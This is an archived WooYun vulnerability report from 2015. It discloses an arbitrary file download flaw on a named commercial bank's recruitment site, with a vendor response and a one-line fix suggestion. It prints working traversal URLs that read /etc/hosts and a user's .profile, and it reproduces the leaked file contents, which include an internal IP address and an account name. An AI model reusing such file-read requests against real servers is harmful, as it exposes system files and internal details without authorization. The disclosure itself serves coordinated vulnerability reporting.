当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125479

漏洞标题:某商业银行存在系统文件任意下载漏洞

相关厂商:某商业银行

漏洞作者: JotPot

提交时间:2015-07-08 21:10

修复时间:2015-08-24 12:02

公开时间:2015-08-24 12:02

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

吴江商业银行存在系统文件任意下载漏洞

详细说明:

1.hosts文件
http://job.wjrcb.com/showImg.do?filename=/etc/hosts
#
# hosts This file describes a number of hostname-to-address
# mappings for the TCP/IP subsystem. It is mostly
# used at boot time, when no name servers are running.
# On small systems, this file can be used instead of a
# "named" name server.
# Syntax:
#
# IP-Address Full-Qualified-Hostname Short-Hostname
#
127.0.0.1 localhost
# special IPv6 addresses
::1 localhost ipv6-localhost ipv6-loopback
fe00::0 ipv6-localnet
ff00::0 ipv6-mcastprefix
ff02::1 ipv6-allnodes
ff02::2 ipv6-allrouters
ff02::3 ipv6-allhosts
192.168.55.20 zxzp zxzp
2. profile文件
http://job.wjrcb.com/showImg.do?filename=/home/zxzp/.profile
# Sample .profile for SuSE Linux
# rewritten by Christian Steinruecken <cstein@suse.de>
#
# This file is read each time a login shell is started.
# All other interactive shells will only read .bashrc; this is particularly
# important for language settings, see below.
test -z "$PROFILEREAD" && . /etc/profile || true
# Most applications support several languages for their output.
# To make use of this feature, simply uncomment one of the lines below or
# add your own one (see /usr/share/locale/locale.alias for more codes)
# This overwrites the system default set in /etc/sysconfig/language
# in the variable RC_LANG.
#
#export LANG=de_DE.UTF-8 # uncomment this line for German output
#export LANG=fr_FR.UTF-8 # uncomment this line for French output
#export LANG=es_ES.UTF-8 # uncomment this line for Spanish output
# Some people don't like fortune. If you uncomment the following lines,
# you will have a fortune each time you log in ;-)
#if [ -x /usr/bin/fortune ] ; then
# echo
# /usr/bin/fortune
# echo
#fi
export JAVA_HOME=/opt/IBM/WebSphere/AppServer/java
export PATH=$JAVA_HOME/bin:$PATH
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar
set -o vi

漏洞证明:

1.hosts文件
http://job.wjrcb.com/showImg.do?filename=/etc/hosts
#
# hosts This file describes a number of hostname-to-address
# mappings for the TCP/IP subsystem. It is mostly
# used at boot time, when no name servers are running.
# On small systems, this file can be used instead of a
# "named" name server.
# Syntax:
#
# IP-Address Full-Qualified-Hostname Short-Hostname
#
127.0.0.1 localhost
# special IPv6 addresses
::1 localhost ipv6-localhost ipv6-loopback
fe00::0 ipv6-localnet
ff00::0 ipv6-mcastprefix
ff02::1 ipv6-allnodes
ff02::2 ipv6-allrouters
ff02::3 ipv6-allhosts
192.168.55.20 zxzp zxzp
2. profile文件
http://job.wjrcb.com/showImg.do?filename=/home/zxzp/.profile
# Sample .profile for SuSE Linux
# rewritten by Christian Steinruecken <cstein@suse.de>
#
# This file is read each time a login shell is started.
# All other interactive shells will only read .bashrc; this is particularly
# important for language settings, see below.
test -z "$PROFILEREAD" && . /etc/profile || true
# Most applications support several languages for their output.
# To make use of this feature, simply uncomment one of the lines below or
# add your own one (see /usr/share/locale/locale.alias for more codes)
# This overwrites the system default set in /etc/sysconfig/language
# in the variable RC_LANG.
#
#export LANG=de_DE.UTF-8 # uncomment this line for German output
#export LANG=fr_FR.UTF-8 # uncomment this line for French output
#export LANG=es_ES.UTF-8 # uncomment this line for Spanish output
# Some people don't like fortune. If you uncomment the following lines,
# you will have a fortune each time you log in ;-)
#if [ -x /usr/bin/fortune ] ; then
# echo
# /usr/bin/fortune
# echo
#fi
export JAVA_HOME=/opt/IBM/WebSphere/AppServer/java
export PATH=$JAVA_HOME/bin:$PATH
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar
set -o vi

修复方案:

进行目录控制

版权声明:转载请注明来源 JotPot@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-07-10 12:00

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论